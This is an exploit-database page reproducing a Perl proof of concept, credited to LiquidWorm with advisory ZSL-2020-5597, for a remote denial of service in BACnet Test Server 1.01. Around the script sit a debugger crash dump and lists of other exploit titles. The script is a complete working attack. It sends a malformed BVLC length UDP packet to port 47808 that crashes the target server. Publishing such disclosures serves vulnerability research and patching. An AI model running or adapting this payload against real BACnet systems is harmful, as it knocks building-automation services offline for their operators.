Become a patron and gain access to the dashboard, Schedule scan, API and Search

Search for hundreds of thousands of exploits

"BACnet Test Server 1.01 - Remote Denial of Service (PoC)"

Author

Exploit author

LiquidWorm

Platform

Exploit platform

windows

Release date

Exploit published date

2020-10-07

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
# Title: BACnet Test Server 1.01 - Remote Denial of Service (PoC)
# Date: 2020-10-07
# Author: LiquidWorm
# Vendor: https://www.bac-test.com
# Product link: https://sourceforge.com/projects/bacnetserver
# CVE: N/A


#!/usr/bin/perl
#
# BACnet Test Server 1.01 Remote Denial of Service Exploit
#
# 
# Vendor: BACnet Interoperability Test Services, Inc.
# Product web page: https://www.bac-test.com
#                   https://sourceforge.com/projects/bacnetserver
# Affected version: 1.01 (BACnet Stack Version 0.5.7)
#
# Summary: This is a simple BACnet Server aimed at developers who
# want to explore or test their BACnet Client implementations of
# the ASHRAE BACnet protocol. It is based on Steve Karg's fine
# implementation of the BACnet Stack.
#
# Desc: The BACNet Test Server is vulnerable to a denial of service
# (DoS) vulnerability when sending malformed BVLC Length UDP packet
# to port 47808 causing the application to crash.
#
# Type - 0x81
# BVLC Function
# - 0x01 - Write Broadcast Distribution Table
# - 0x02 - Read Broadcast Distribution Table
# - 0x03 - Read Broadcast Distribution Table ACK
# - 0x04 - Forwarded NPDU with optional Originating Device IP address and Port included in BVLL header
# - 0x05 - Register Foreign Device with expiration timeout (Time-to-live) in seconds
# - 0x0a - Original-Unicast-NPDU used to send directed NPDUs to another BACnet/IP device or router.
#   Optional Originating Device IP address and Port NOT included in BVLL header.
# - 0x0b - Original-Broadcast-NPDU used by devices (except foreign devices) to broadcast messages on B/IP networks.
# - 0x0c - Secure-BVLL
# - BVLL Length
# - IP address of Originating Device - optional depending on BVLC Function Code
# - Port number of Originating Device - optional depending on BVLC Function Code
# - NPDU - Network Layer Protocol Data Unit
#
# =================================================================
# (67c.2f34): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# *** WARNING: Unable to verify checksum for C:\Program Files (x86)\BACnet Interoperability Testing Services, Inc\BACnet Server\Server.exe
# eax=00600000 ebx=00692000 ecx=009bd796 edx=005fee00 esi=005fec04 edi=005fed00
# eip=00994313 esp=005fec04 ebp=005fed00 iopl=0         nv up ei pl nz ac pe nc
# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
# Server+0x34313:
# 00994313 8810            mov     byte ptr [eax],dl          ds:002b:00600000=?? 
# 0:000> d 994313 +77
# 0099438a cccccccc
# 0099438e cccccccc
# 00994392 cccccccc
# 00994396 cccccccc
# 0099439a cccccccc
# 0:000> d esp
# 005fec04 005ff3f8
# 005fec08 005ff408
# 005fec0c 00692000
# 005fec10 cccccccc
# 005fec14 cccccccc
# 004fec18 cccccccc
# =================================================================
#
# Tested on: Microsoft Windows 10 Professional (EN)
#            Microsoft Windows 7 Professional SP1 (EN)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2020-5597
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5597.php
#
#
# 05.08.2019
#

use strict;
use warnings;
use IO::Socket::INET;

my $target = "10.0.99.34";
my $porta = 47808;
my $proto = "udp";
my $stype = SOCK_DGRAM;
my $timeout = 1;

my $socket = new IO::Socket::INET (
PeerHost => $target,
PeerPort => $porta,
Proto => $proto,
Type => $stype,
Timeout => $timeout
) or die "Socket error. : $!\n";

print "Connected to: $target:$porta\n";

$| = 1;
binmode $socket;

my $data = "\x81\x09\xFF\xFE";

print "Sending: $data [ ".length($data)." bytes ]\n";
send ($socket, $data, 0) or die "Nope: $!\n";
print "Done.\n";

$socket->close();
Release Date Title Type Platform Author
2020-10-16 "Seat Reservation System 1.0 - Remote Code Execution (Unauthenticated)" webapps php "Rahul Ramkumar"
2020-10-16 "Hotel Management System 1.0 - Remote Code Execution (Authenticated)" webapps php Aporlorxl23
2020-10-16 "Restaurant Reservation System 1.0 - 'date' SQL Injection (Authenticated)" webapps php b1nary
2020-10-16 "aaPanel 6.6.6 - Privilege Escalation & Remote Code Execution (Authenticated)" webapps python "รœnsal Furkan Harani"
2020-10-16 "Employee Management System 1.0 - Authentication Bypass" webapps php "Ankita Pal"
2020-10-16 "Company Visitor Management System (CVMS) 1.0 - Authentication Bypass" webapps php "OฤŸuz Tรผrkgenรง"
2020-10-16 "Employee Management System 1.0 - Cross Site Scripting (Stored)" webapps php "Ankita Pal"
2020-10-16 "Alumni Management System 1.0 - Authentication Bypass" webapps php "Ankita Pal"
2020-10-16 "CS-Cart 1.3.3 - authenticated RCE" webapps php 0xmmnbassel
2020-10-16 "Seat Reservation System 1.0 - Unauthenticated SQL Injection" webapps php "Rahul Ramkumar"
Release Date Title Type Platform Author
2020-10-14 "Guild Wars 2 - Insecure Folder Permissions" local windows "George Tsimpidas"
2020-10-13 "Battle.Net 1.27.1.12428 - Insecure File Permissions" local windows "George Tsimpidas"
2020-10-07 "BACnet Test Server 1.01 - Remote Denial of Service (PoC)" dos windows LiquidWorm
2020-09-29 "BearShare Lite 5.2.5 - 'Advanced Search'Buffer Overflow in (PoC)" local windows "Christian Vierschilling"
2020-09-29 "CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)" local windows boku
2020-09-28 "MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation" local windows "Matteo Malvica"
2020-09-21 "ForensiTAppxService 2.2.0.4 - 'ForensiTAppxService.exe' Unquoted Service Path" local windows "Burhanettin Ozgenc"
2020-09-17 "Microsoft SQL Server Reporting Services 2016 - Remote Code Execution" remote windows "West Shepherd"
2020-09-16 "Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software" local windows hyp3rlinx
2020-09-14 "Pearson Vue VTS 2.3.1911 Installer - 'VUEApplicationWrapper' Unquoted Service Path" local windows Jok3r
Release Date Title Type Platform Author
2020-10-07 "BACnet Test Server 1.01 - Remote Denial of Service (PoC)" dos windows LiquidWorm
2020-10-01 "SpinetiX Fusion Digital Signage 3.4.8 - Database Backup Disclosure" webapps hardware LiquidWorm
2020-10-01 "SpinetiX Fusion Digital Signage 3.4.8 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2020-10-01 "Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow" remote hardware LiquidWorm
2020-10-01 "BrightSign Digital Signage Diagnostic Web Server 8.2.26 - Server-Side Request Forgery (Unauthenticated)" webapps hardware LiquidWorm
2020-10-01 "BrightSign Digital Signage Diagnostic Web Server 8.2.26 - File Delete Path Traversal" webapps hardware LiquidWorm
2020-10-01 "SpinetiX Fusion Digital Signage 3.4.8 - Username Enumeration" webapps hardware LiquidWorm
2020-09-25 "B-swiss 3 Digital Signage System 3.6.5 - Cross-Site Request Forgery (Add Maintenance Admin)" webapps multiple LiquidWorm
2020-09-25 "B-swiss 3 Digital Signage System 3.6.5 - Database Disclosure" webapps multiple LiquidWorm
2020-09-21 "B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution" webapps multiple LiquidWorm
2020-09-14 "Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path" local windows LiquidWorm
2020-08-28 "Eibiz i-Media Server Digital Signage 3.8.0 - Privilege Escalation" webapps hardware LiquidWorm
2020-08-26 "Eibiz i-Media Server Digital Signage 3.8.0 - Directory Traversal" webapps multiple LiquidWorm
2020-08-24 "Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure" webapps hardware LiquidWorm
2020-08-24 "Eibiz i-Media Server Digital Signage 3.8.0 - Authentication Bypass" webapps hardware LiquidWorm
2020-08-17 "QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Deletion" webapps hardware LiquidWorm
2020-08-17 "QiHang Media Web Digital Signage 3.0.9 - Remote Code Execution (Unauthenticated)" webapps hardware LiquidWorm
2020-08-17 "QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Disclosure" webapps hardware LiquidWorm
2020-08-17 "QiHang Media Web Digital Signage 3.0.9 - Cleartext Credential Disclosure" webapps hardware LiquidWorm
2020-08-07 "All-Dynamics Digital Signage System 2.0.2 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2020-07-26 "UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2020-07-23 "UBICOD Medivision Digital Signage 1.5.1 - Authorization Bypass" webapps hardware LiquidWorm
2020-06-04 "Cayin Digital Signage System xPost 2.5 - Remote Command Injection" webapps multiple LiquidWorm
2020-06-04 "SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User)" webapps hardware LiquidWorm
2020-06-04 "Cayin Signage Media Player 3.0 - Remote Command Injection (root)" webapps multiple LiquidWorm
2020-06-04 "Cayin Content Management Server 11.0 - Remote Command Injection (root)" webapps multiple LiquidWorm
2020-06-04 "Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read" webapps hardware LiquidWorm
2020-05-08 "Extreme Networks Aerohive HiveOS 11.0 - Remote Denial of Service (PoC)" dos hardware LiquidWorm
2020-04-24 "Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution" webapps java LiquidWorm
2020-04-21 "P5 FNIP-8x16A FNIP-4xSH 1.0.20 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48860/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.